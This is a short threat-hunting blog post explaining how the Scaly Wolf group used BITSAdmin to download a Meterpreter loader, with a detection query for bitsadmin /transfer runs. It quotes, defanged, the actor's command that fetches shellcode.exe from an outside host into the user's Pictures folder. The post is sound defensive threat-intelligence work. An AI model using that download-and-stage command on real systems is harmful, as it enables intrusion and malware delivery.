230. Scaly Wolf Abuses BITSAdmin for Ingress Tool Transfer

Hello everyone!

Adversaries always abuse legitimate utilities, for example, curl and wget, to download malware and tools to the compromised system. But today we'll look at a more rare tool used for Ingress Tool Transfer (T1105).

I'm talking about BITSAdmin. I don't see it used by adversaries very often, but still there are a few examples. One of them - Scaly Wolf. The threat actors leveraged BITSAdmin to download a Meterpreter loader:

powershell  -Command "bitsadmin /transfer "DownloadJob" "hxxps[:]//roscosmosmeet[.]online/shellcode.exe" "$env:USERPROFILE\Pictures\zabix.exe""

As it's not commonly used, we can hunt for BITSAdmin executions with /transfer argument:

event_type: "processcreatewin"

AND

proc_file_path: "bitsadmin.exe"

AND

cmdline: "transfer"

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge